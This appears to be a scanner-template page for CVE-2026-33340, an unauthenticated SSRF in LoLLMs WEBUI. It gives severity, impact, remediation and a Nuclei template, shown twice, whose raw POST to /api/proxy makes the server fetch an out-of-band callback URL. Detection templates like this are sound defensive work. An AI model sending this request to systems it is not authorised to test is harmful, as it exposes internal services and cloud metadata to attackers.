LoLLMs WEBUI - Server-Side Request Forgery

CVE-2026-33340

Verified

Description

LoLLMs WEBUI contains a server-side request forgery caused by unauthenticated access to the /api/proxy endpoint, letting attackers force the server to make arbitrary GET requests, exploit requires no authentication.

Severity

Critical

CVSS Score

9.1

Exploit Probability

Published Date

April 9, 2026

Template Author

theamanrawat

CVE-2026-33340.yaml

id: CVE-2026-33340

info:
  name: LoLLMs WEBUI - Server-Side Request Forgery
  author: theamanrawat
  severity: critical
  description: |
    LoLLMs WEBUI contains a server-side request forgery caused by unauthenticated access to the /api/proxy endpoint, letting attackers force the server to make arbitrary GET requests, exploit requires no authentication.
  impact: |
    Attackers can access internal services, scan local networks, or exfiltrate sensitive cloud metadata, potentially leading to data exposure and further compromise.
  remediation: |
    Update to a patched version once available or apply mitigations to restrict server-side requests.
  reference:
    - https://github.com/ParisNeo/lollms-webui/security/advisories/GHSA-mcwr-5469-pxj4
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33340
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-33340
    epss-score: 0.09186
    epss-percentile: 0.92786
    cwe-id: CWE-306
  metadata:
    max-requests: 1
    verified: true
  tags: cve,cve2026,lollms,ssrf

http:
  - raw:
      - |
        POST /api/proxy HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"url": "http://{{interactsh-url}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains(interactsh_protocol, "http")'
          - 'contains(body, "{\"content\":\"")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022030d7da5b3fd2cddd3563b3bc2ba730f5cf9420bfdfa288567f5179c6f0d36fb702210081860b88c8ff93d8c5112e6adf8bf7f3483b2972f3cc891b2a646282c3dea89c:922c64590222798bb761d5b6d8e72950

9.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVE ID:

cve-2026-33340

CWE ID:

cwe-306

References

https://github.com/ParisNeo/lollms-webui/security/advisories/GHSA-mcwr-5469-pxj4 https://nvd.nist.gov/vuln/detail/CVE-2026-33340

Remediation Steps

Update to a patched version once available or apply mitigations to restrict server-side requests.

id: CVE-2026-33340

info:
  name: LoLLMs WEBUI - Server-Side Request Forgery
  author: theamanrawat
  severity: critical
  description: |
    LoLLMs WEBUI contains a server-side request forgery caused by unauthenticated access to the /api/proxy endpoint, letting attackers force the server to make arbitrary GET requests, exploit requires no authentication.
  impact: |
    Attackers can access internal services, scan local networks, or exfiltrate sensitive cloud metadata, potentially leading to data exposure and further compromise.
  remediation: |
    Update to a patched version once available or apply mitigations to restrict server-side requests.
  reference:
    - https://github.com/ParisNeo/lollms-webui/security/advisories/GHSA-mcwr-5469-pxj4
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33340
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-33340
    epss-score: 0.09186
    epss-percentile: 0.92786
    cwe-id: CWE-306
  metadata:
    max-requests: 1
    verified: true
  tags: cve,cve2026,lollms,ssrf

http:
  - raw:
      - |
        POST /api/proxy HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"url": "http://{{interactsh-url}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains(interactsh_protocol, "http")'
          - 'contains(body, "{\"content\":\"")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022030d7da5b3fd2cddd3563b3bc2ba730f5cf9420bfdfa288567f5179c6f0d36fb702210081860b88c8ff93d8c5112e6adf8bf7f3483b2972f3cc891b2a646282c3dea89c:922c64590222798bb761d5b6d8e72950

LoLLMs WEBUI - Server-Side Request Forgery

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

LoLLMs WEBUI - Server-Side Request Forgery

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps